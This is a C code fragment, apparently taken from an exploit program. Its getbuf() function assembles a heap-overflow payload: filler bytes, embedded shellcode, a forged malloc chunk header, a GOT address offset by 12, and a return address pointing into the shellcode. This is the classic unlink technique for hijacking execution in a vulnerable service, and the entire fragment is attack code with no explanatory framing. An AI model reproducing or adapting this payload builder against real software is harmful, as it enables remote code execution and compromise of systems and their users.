
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int gotaddr ;
 scalar_t__ malloc (int) ;
 int memcpy (char*,int ,int ) ;
 int memset (char*,int,int) ;
 int printe (char*,int) ;
 long requestaddr ;
 long retoffset ;
 int strlen (int ) ;
 int x86_exec ;

char *getbuf(void){
 char *buf;

 if(!(buf=(char *)malloc(1024+16+2+1)))
  printe("getbuf(): allocating memory failed.",1);
 memset(buf,0x78,1024);


 memcpy(buf+64,x86_exec,strlen(x86_exec));

 *(long *)&buf[1024]=0xfffffffc;
 *(long *)&buf[1028]=0xffffffff;
 *(long *)&buf[1032]=(gotaddr-12);
 *(long *)&buf[1036]=(requestaddr+retoffset);
 buf[1040]=0x0a;

 buf[1041]=0x0a;
 return(buf);
}
